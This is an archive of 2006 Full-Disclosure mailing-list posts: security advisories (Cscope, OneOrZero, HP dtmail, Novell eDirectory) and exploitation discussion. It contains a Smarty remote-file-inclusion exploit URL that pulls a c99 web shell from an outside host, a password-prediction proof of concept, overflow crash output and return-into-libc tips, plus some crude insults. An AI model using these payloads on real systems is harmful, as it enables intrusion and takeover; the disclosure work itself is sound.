[Full-disclosure] [ GLSA 200610-08 ] Cscope: Multiple buffer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200610-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Cscope: Multiple buffer overflows Date: October 20, 2006 Bugs: #144869 ID: 200610-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Cscope is vulnerable to multiple buffer overflows that could lead to the execution of arbitrary code. Background == Cscope is a developer's tool for browsing source code. Affected packages = --- Package / Vulnerable /Unaffected --- 1 dev-util/cscope 15.5.20060927 = 15.5.20060927 Description === Unchecked use of strcpy() and *scanf() leads to several buffer overflows. Impact == A user could be enticed to open a carefully crafted file which would allow the attacker to execute arbitrary code with the permissions of the user running Cscope. Workaround == There is no known workaround at this time. Resolution == All Cscope users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-util/cscope-15.5.20060927 References == [ 1 ] CVE-2006-4262 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4262 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200610-08.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp1VQ1AprET2.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] trouble in milwaukee?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 T, Edward F. Klimowicz said: Trying to access from Philadelphia to Wilwaukee, I get erratic network drops going through Time Warner Telecom. Anyone aware of any issue? This apparently started around 7:30p EDT. Yeah, some skript kiddies with an IOS exploit were causing BGP flaps. Not really - but if there were, that would be almost the only way it could be on-topic for full-disclosure. I don't suppose you have anything more specific to go on, like an actual traceroute or something? Or other data that explains why you think it's Time Warner rather than their up/downstream? Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Thank you. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkU4hKgACgkQ3AEcWsxdEQ5FRAP+KiksF8whx6V0jwA6Kzj2p4hrVFSa UJmsNYQb3DWWy5YM/EaNQNd5rEZOuaPLj0kJPx3Lt+P0C9bPsue/Id31wzLihKvx1yyT HhNZ7xiqWgfvnx+ZLxe9G50/nLie8ZJT3cySlTT0iCXuTTcgOMmJGnlWp1v/tabFraOq UhRc44w= =tRH7 -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat [EMAIL PROTECTED] wrote: I didn't know those were mutually exclusive. Thats like asking your mom is she is a slut or a whore. Aren't they one and the same? On 10/15/06, upb [EMAIL PROTECTED] wrote: are you fucking stupid or just retarded? On 10/14/06, hitham hitham [EMAIL PROTECTED] wrote: Hi I find a new vuln ... the vuln :- # # Auother :- Sp1deR_NeT # E-mail :- [EMAIL PROTECTED] # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . # Script :- Smarty-2.6.9 Exploit :- libs/Smarty.class.php?filename= www.soqor.net/tools/c99.txt? Example :- www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.ne t/tools/c99.txt ? Vuln Code :- /** * wrapper for include() retaining $this * @return mixed */ function _include($filename, $once=false, $params=null) { if ($once) { return include_once($filename); } else { return include($filename); } } - Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA. - WwW.Sp1deR-N3T.Com ///\\\///\\\ [EMAIL PROTECTED] [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED] _ Windows Live™ Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkU4hOEACgkQ3AEcWsxdEQ7OMAP+OFcUTRO2LF0UVWl1YdKpTaMnrsTG 1ML9rZcc276Q9nzsVV3O4SPTd2KExuToLUp1YU16DxtmV5Nk7wbd4yqcOEa996bWWTq8 Kc/oK04GJgGoLX9BqGvXkuLXEjZFfTaZegbshjUUJjH/kGEYFdutIlHlkqtL2uNUjMW/ P69GcKk= =F3kH -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] trouble in milwaukee?
[EMAIL PROTECTED] wrote: Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. You forgot to apply that rule iteratively again, didn't you... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Web-style Wireless IDS attacks
Web-style Wireless IDS attacks By Sergey Gordeichik, Positive Technologies Security Expert Introduction Wireless intrusion detection systems (WIDS) are not yet as popular as their wired counterparts, but current trends would suggest that their number is set to grow. One positive factor in this respect is the integration of such programs with active network equipment and Management awareness of the risks associated with the unauthorised use of wireless devices. This awareness has led to an increase in the number of WIDS installations - even where wireless networks are not used. In view of this situation, specialists in the field of security are now aware of the need to evaluate not only the quality features of any product, but also of the need to predict any possible negative influence arising from its implementation on the security of a corporate network. This article looks at the results of research into wireless intrusion detection systems from the point of view of the specialist in the field of applications security. Design faults discovered are not discussed in the article as their correction requires significant effort on the part of the manufacturer. Full article: http://maxpatrol.com/webwids.asp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] tiny PE now at... 304 bytes. Is this the end?
On Fri, 20 Oct 2006 06:33:32 CDT, Gadi Evron said: Gil kept working on tiny PE, and many others started pitching in ideas. Bah. Pikers. This guy got a Linux executable down to smaller than the ELF header. 45 bytes. http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html pgp7CJQ4Yps3J.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Devil Linux 1.2.10 has an IRC bot onboard
Sorry, sorry. The package was from Sourceforge and md5 is correct. There is an intrusion into our systems. Most probably, the intruder exploited public key login from another host. The devil-linux.org site was inaccessible because of a problem in our http proxy which cached 0- size page for several days. Coincidence of coincidences, my excuses. There no problems with DevilLinux distro. Victor Grishchenko On 19.10.2006, at 22:44, Noam Rathaus wrote: Hi, I looked into devil-linux-1.2.10-i486.tar.bz2 from SourceForge, but didn't see what you mentioned... where did you get the package from? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] tiny PE now at... 304 bytes. Is this the end?
Gil kept working on tiny PE, and many others started pitching in ideas. Apparently, one of the latest idea Gil was playin with (as mentioned in his first post) Optional Header Size. Apparently, as two reversers in anti virus companies let him know, a virus played with this too, which got tiny PE down to 330 bytes. After more games, as he described below, it's now at 304 bytes and I wonder who will shave those 4 bytes off? Tiny PE v.3 can be found here: http://ragestorm.net/tiny/tiny3.exe Blog on details here: http://blogs.securiteam.com/index.php/archives/690 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] tiny PE now at... 304 bytes. Is this the end?
--On Friday, October 20, 2006 08:53:36 -0400 [EMAIL PROTECTED] wrote: On Fri, 20 Oct 2006 06:33:32 CDT, Gadi Evron said: Gil kept working on tiny PE, and many others started pitching in ideas. Bah. Pikers. This guy got a Linux executable down to smaller than the ELF header. 45 bytes. http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html Yeahbut, that's equivalent to 450 bytes on Windows, isn't it? :-) Paul Schmehl ([EMAIL PROTECTED]) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ p7sPmVhxHFM4T.p7s Description: S/MIME cryptographic signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fire and forget exploits?
Hi, I'm looking for examples of (remote) security vulnerabilities whose exploitation involves no guesswork--eg, no bruteforcing the return address, or altering your exploit based on the server's response, etc. It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. Anyways, if anyone has come across things like this, I'd greatly appreciate hearing about it. I'm working on some new methods to deliver exploits at once while minimizing recon. Thanks, Brendan Dolan-Gavitt ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fire and forget exploits?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Brendan Dolan-Gavitt wrote: Hi, I'm looking for examples of (remote) security vulnerabilities whose exploitation involves no guesswork--eg, no bruteforcing the return address, or altering your exploit based on the server's response, etc. I guess you're thinking about _remote_ exploitation ? You don't have to guess anything for a local bo for instance.. Anyway : It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly Target the kernel ? Use linux-gate.so ? Portability of your exploit will greatly depend on how you choose to exploit the vulnerability, since it's quite common to have to choose btw several exploitation scenarii.. different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. the language also affects some pointers. Anyway, if you need let s say a jmp esp , you can try to choose one location in memory that contains this opcode for several SP/languages. But I don't think you can prove any exploit will be universal... (can you ? ;) Anyways, if anyone has come across things like this, I'd greatly appreciate hearing about it. I'm working on some new methods to deliver exploits at once while minimizing recon. Thanks, Brendan Dolan-Gavitt Cheers, endrazine- -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFOPC7zX6JtL3KgRURAqAyAKDaza2Khkjv9qVd9NZAtu/xjHjxFgCg2z8D V4wY66PaL6iTgk7QrQg31jc= =pkfO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fire and forget exploits?
On Fri, 20 Oct 2006, Brendan Dolan-Gavitt wrote: It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. Doesn't this implicitly support Dan Geer et al's argument about software monoculture? In fact, wouldn't the linux monoculture concept constitute a bit of a misnomer? Each slightly different userland and libc would constitute a different flavor, right? Nevertheless, the received wisdom remains that If linux took over from Windows tomorrow, all the hackers would concentrate on linux flaws, and we'd be in the same position. -- Bruce Ediger 720-932-1954 [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] tiny PE now at... 304 bytes. Is this the end?
Bah. Pikers. This guy got a Linux executable down to smaller than the ELF header. 45 bytes. http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html Yeahbut, that's equivalent to 450 bytes on Windows, isn't it? :-) No, it's equivalent to 144 bytes for NT and later, and 132 bytes for XP and later. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory for Oneorzero helpdesk
Permanant Link : http://www.whitedust.net/speaks/3043/ - Advisory for OneOrZero Helpdesk - - OneOrZero Helpdesk - AFFECTED PRODUCTS = OneOrZero Helpdesk v1.6.0 - v1.6.4 OVERVIEW From the website: The OneOrZero Open Source Task Management and Help Desk System is a powerful task management and help desk application, based to 'get the job done'. http://www.oneorzero.com/ An insecure password reset allows external knowledge of what the password is set to. DETAILS === 1. Information Disclosure The forgot password function will reset the password after a security question is answered. However, the admin user has this password left blank by default and is often left that way after the program is installed. By attempting to reset the admin password and leaving the answer blank one can force a reset of the password. However, since the password reset function sets the password based only on the username and the time on the server, the password that it is set to can be determine easily. Once the time of a server is discovered determining what the password is set to becomes trivial. POC === 1. -- The password is generated with the following code: $password = time().$_POST[username]; Quite often web servers will return the date on the servers for when the request is processed. For example Date: Thu, 12 Oct 2006 01:11:21 GMT The following command on a linux will return the unix time for the system for when the request was processed. bash$ date --date=Thu, 12 Oct 2006 01:11:21 GMT +%s 1160615001 Which allows us to deduce the return password of 1160615001admin SOLUTION: = vendor contact: [EMAIL PROTECTED] Sept. 28 Vendor notification. [EMAIL PROTECTED] Sept. 29 Vendor reply [EMAIL PROTECTED] Oct. 10 oneorzero v1.6.5.4 released to address this issue. Credits === This vulnerability was discovered and researched by Michael Klingler whitehatguru at gmail.com SecurityMetrics, Inc. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fire and forget exploits?
On Fri, Oct 20, 2006 at 10:09:13AM -0600, Bruce Ediger wrote: On Fri, 20 Oct 2006, Brendan Dolan-Gavitt wrote: It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. Doesn't this implicitly support Dan Geer et al's argument about software monoculture? In fact, wouldn't the linux monoculture concept constitute a bit of a misnomer? Each slightly different userland and libc would constitute a different flavor, right? Nevertheless, the received wisdom remains that If linux took over from Windows tomorrow, all the hackers would concentrate on linux flaws, and we'd be in the same position. You are also forgetting ASLR as it is getting deployed in most new Linux systems. This reduces the mono culture aspect. (Windows is catching up here too.) Ciao, Marcus ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] *ADVISORY UPDATE* [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard has updated this advisory with new information provided by the vendor. This advisory has been updated. Netragard, L.L.C Advisory* *** Strategic Reconnaissance Team http://www.netragard.com -- We make I.T. Safe. [About Netragard] - -- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Official URL] - - http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt [Advisory Information] - -- Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20060810 Product Name: dtmail Product Version : see operating system Vendor Name : Hewlet Packard Criticality : Local Root Compromise Effort : Easy Operating System: HP Tru64 UNIX 5.1B-3 HP Tru64 UNIX 5.1B-2/PK4 HP Tru64 UNIX 5.1A PK6 HP Tru64 UNIX 4.0G PK4 HP Tru64 UNIX 4.0F PK8 HP-UX B.11.23 HP-UX B.11.11 HP-UX B.11.00 Type: Unchecked Buffer [Product Description] - -- The dtmail program is a desktop mail application. It provides an easy to use interface for viewing, filing, composing and sending electronic mail folders and mail messages. dtmail provides a GUI-based interface for manipulating electronic mail messages that can have attachments. Use the interface to compose a message, view a message or a folder containing messages, load new mail ,copy or move messages from one folder to another, delete messages, reply to messages, add and delete attachments to a message when composing, and view the contents of attachments in a message. dtmail also supplies a mail-pervasive desktop environment by providing a public Tooltalk API that other clients can use to compose and send messages. You can use dtmail as a Post Office Protocol (POP) to connect to mail servers offering POP services. If you choose this option, you can also select APOP authentication (if supported by your mail server) to encrypt your user ID and password during communications with your network mail server. [Technical Summary] - -- dtmail suffers from a buffer overflow vulnerability which could result in the execution of arbitrary code. More specifically this vulnerability is triggered when using -a flag: -a file1 ...fileN Bring up a Compose window with file1 through fileN as attachments. [Technical Details] - -- This was tested against tru64 version 5.1b using a system (a working display is required). The following gdb output demonstrates the vulnerability. gdb) r -a -a `perl -e 'print A x 9000'` Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print Ax 9000'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414140 This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic- fence-post' command. Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Roman Medina-Heigl Hernandez escribió: Product Name: dtmail Product Version : 5.1b Vendor Name : Hewlet Packard Criticality : Local Root Compromise Effort : Easy Operating System: Tru64 Type: Unchecked Buffer Hello, I've just installed vulnerable package in my test-bed: # uname -a OSF1 alpha V5.1 2650 alpha # pwd /mnt/ALPHA/BASE # setld -l . OSFCDEMAIL540 # ls -l /usr/dt/bin/dtmail -r-xr-sr-x 1 bin mail 1212752 Oct 17 2002 /usr/dt/bin/dtmail # How is this a local root? (binary is setgid mail but not setuid root) Confirmed by HP: *NOT* a local root. The vulnerability could be exploited by a local, authorized user to execute arbitrary code as a member of the 'mail' group. http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=encc=usobjectID=c00793805jumpid=reg_R1002_USEN Interesting enough to note that the bug is also present in HPUX (same scope, again not a local root). Netragard ppl should fix their advisory and web site... - -- Saludos, - -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFFOQiL5H+KferVZ0IRAhsoAJ9RGDnKl+bfj4sKipKyl6i8KBVDQwCePbrR OPOjUt/j090/ZelHuzJZuBk= =BZop -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Command Processor CMD.EXE Buffer Overflow
YEah! Buffer Overflow Windows XP SP2 I Hill debug this. Luís Alberto Cortes Zavala IT / Security Consultant [EMAIL PROTECTED] http://www.securitynation.com -Mensaje original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] En nombre de The SNiFF Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m. Para: [EMAIL PROTECTED] Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow Copy-paste the following line in cmd.exe and execute it.. (it is a single command, has been split into multiple lines for readability sake). %COMSPEC% /K dir \\?\ AA A A (260 characters of 'A's) Tried it on Win2k3 SP1: C:\Documents and Settings\Administrator%COMSPEC% /K dir\\?\AA AA System replied: The filename or extension is too long. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 PERFECT.MATERIAL escribió: Correction, TRU64 runs on Alphas in LSB mode. However, this bug is still not exploitable. Sorry for the NETRAGARD-like fuckup :D I didn't have time enough to test this, but at first sight it seems perfectly exploitable. Alpha is a true 64 bits RISC processor (both data addressing being 64 bits), little-endian. A typical stack address is something like: 0x1530 ( \x30\xf5\xff\x1f\x01\x00\x00\x00 ) So yes, you have nulls (3, in this case), but at the end of the string :-) You can try a typical string-alike buffer: [ NOPs ... SHELLCODE RET ] (stack variables are just before RET, you have not saved frame pointer stored here) Assuming a typical RET value (like the former one), your exploit should rely on memory being more or less clean, I mean, at least two nulls (the third one is \0 terminator byte, you can insert it) should be exist in the memory location where the attack string is being copied (well, at the end of the string). Is this difficult? I don't think so (but I don't really know for sure). You can minimize the problem if you use longer RET addreses. For instance, a typical address inside libc functions could be: 0x3ff800f3810 (so you have two nulls, instead of three). You'd have to deal with only one residual null value, instead of two. You can try this with a typical return into libc exploit. This should be also sufficient (and useful) to avoid non-executable stack protection, which is enabled by default in Tru64. Well, that's the theory... :-) - -- Saludos, - -Roman PGP Fingerprint: 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742 [Key ID: 0xEAD56742. Available at KeyServ] -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (MingW32) iD8DBQFFOTed5H+KferVZ0IRAlWEAJ0YkY8LfGaqqYglNkuqj4ZDXwrJ8QCgvFIU zyQhr3AP26MlKOVdKdk4Dio= =Iga8 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fire and forget exploits?
Brendan Dolan-Gavitt wrote: I'm looking for examples of (remote) security vulnerabilities whose exploitation involves no guesswork--eg, no bruteforcing the return address, or altering your exploit based on the server's response, etc. It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. I don't think this is the main reason such exploits are less commonly seen these days. A great deal of hackish activity is now directly or indirectly focussed on spamming, identity theft and related scams, and the money laundering that necesarily trails along behind such activity. In general, all these folk need to achieve their ends are stupid bugs in web applications. The web is replete with crappily written, widely deployed PHP schlock that more than fulfills these folks needs. As they make money from working this plentiful low-hanging fruit, there is little motivation for many of them to spend the time and effort on the much more elusive grand exploits of days gone by... In fact, they generaly want to stay _under_ the radar for as long as possible -- their business model depends on it -- rather than making the big splash on CNN, doing a Markoff interview/book/movie deal, etc, etc... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The advisory has been updated and fixed on the web page. Thank you for catching the errors in the posting, we appreciate it. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (Darwin) iD8DBQFFOUPBQwbn1P9Iaa0RAuHSAJ41wIJio61KcyUHW0SdeFp6qiGG8QCdE7Os 2CNkn+TL7cQqxjBmO4iXTMc= =TdM6 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Who is n3td3v?
On Fri, 20 Oct 2006, Dr. Neal Krawetz wrote: On Fri Oct 20 15:49:53 2006, Gadi Evron wrote: Cool article, but n3td3v is not gobbles. For one, easy analysis shows he is English. Gadi. Thanks Gadi. However, I'm going to call you on this: 1. What easy analysis are you using? I listed my approaches. If you are using a different approach, I'd like to hear what it is. (I'm not trying to be argumentative -- I want to learn.) 2. You said, n3td3v is not gobbles. Do you know for a fact that n3td3v is not Gobbles Security? Or is this an interpretation? If you know for a fact, then how do you know? On 1-Sep-2006, a new person controlling the n3td3v account appeared. He is likely English/Brit (based on the topics he posted). But I did not see enough text to analyze. The older n3td3v postings were by 3 people, not one person. (And primarily by three people -- a few postings were ambiguous and could indicate more people.) 1. He speaks Real English. 2. He mentions UK currency. 3. He said as much, speaking of UK issues. 4. He gave his real name. Your analysis is amazing, and shows how these things should be done. But misses that much. Gobbles was about fun, n3td3v took himself seriously rather than just his goal of making the world a better place. Aside to that, yes, I know. But as I can't mention how, it's silly for me to stick to anything but the above. From the UK. Highly likely from the North of England or Scotland. Did you ever talk to n3td3v or ask him? Behind all that posted, he really seems like a good guy with good intentions. Your analysis really is good, but it comes to no conclusions. I want to advoid the yes he is no he isn't discussion that's to follow. View my comments as opinion. Why idolize people? Gadi. -Neal Neal Krawetz, Ph.D. Hacker Factor Solutions http://www.hackerfactor.com/ Author of Introduction to Network Security (Charles River Media, 2006) http://www.charlesriver.com/Books/BookDetail.aspx?productID=126130 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hustle Labs MNIN eDirectory Vulnerability
As of 20-October-2006, Ryan Smith from Hustle Labs (http://www.hustlelabs.com) and Michael Ligh from MNIN (http://www.mnin.org) have released an advisory detailing a vulnerability in Novell eDirectory HTTPStk. This vulnerability occurs when processing HTTP Request headers and can be triggered by a remote, anonymous attacker and will yield super-user access to the machine. For more information please visit http://www.mnin.org/advisories/2006_novell_httpstk.pdf Thanks, Michael Ligh and Ryan Smith ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] trouble in milwaukee?
Title: Hushmail Express [EMAIL PROTECTED] has sent you a secure email using Hushmail. To read it, please visit the following web page: https://www.hushmail.com/express/44BR8JRE Frequently Asked Questions: Why did I receive this email? You have received this email because you have been sent a secure email through Hushmail. To read your secure email, you must follow the link provided and correctly answer a secret question created by the sender. What is a secure email? Sending a regular email is like sending a postcard - it may be read by any number of people before reaching its recipient(s). A secure email is like sending a letter in a sealed envelope - it can only be read by the sender and intended recipient(s). Is it safe to follow the link in this email? It is safe to visit the Hushmail web site by following the link provided in this email; however you should never open an email attachment unless you know the person who sent it to you, you were expecting to receive the file from them, and you have scanned the file for viruses. When you arrive at the Hushmail web site, be sure to check the following: The address bar of your web browser shows: https://www.hushmail.com/express/ A small picture of a padlock appears in the bottom right corner of your web browser If you would prefer to access your message by entering its message code, please visit the following web page: https://www.hushmail.com/express. You will be asked to enter the following message code: 44BR 8JRE What is Hushmail? Hushmail is a web-based email service that lets you send and receive email in total security using OpenPGP standard algorithms. These algorithms, combined with Hushmail's unique key management system, provide unrivalled levels of security. Hushmail's encryption is automatic, transparent, and seamless - no special computer skills are required. How do I create a free Hushmail account? You can create a free Hushmail account by clicking on the following link: https://www.hushmail.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [funsec] Who is n3td3v?
Title: Hushmail Express [EMAIL PROTECTED] has sent you a secure email using Hushmail. To read it, please visit the following web page: https://www.hushmail.com/express/V52HR6JN Frequently Asked Questions: Why did I receive this email? You have received this email because you have been sent a secure email through Hushmail. To read your secure email, you must follow the link provided and correctly answer a secret question created by the sender. What is a secure email? Sending a regular email is like sending a postcard - it may be read by any number of people before reaching its recipient(s). A secure email is like sending a letter in a sealed envelope - it can only be read by the sender and intended recipient(s). Is it safe to follow the link in this email? It is safe to visit the Hushmail web site by following the link provided in this email; however you should never open an email attachment unless you know the person who sent it to you, you were expecting to receive the file from them, and you have scanned the file for viruses. When you arrive at the Hushmail web site, be sure to check the following: The address bar of your web browser shows: https://www.hushmail.com/express/ A small picture of a padlock appears in the bottom right corner of your web browser If you would prefer to access your message by entering its message code, please visit the following web page: https://www.hushmail.com/express. You will be asked to enter the following message code: V52H R6JN What is Hushmail? Hushmail is a web-based email service that lets you send and receive email in total security using OpenPGP standard 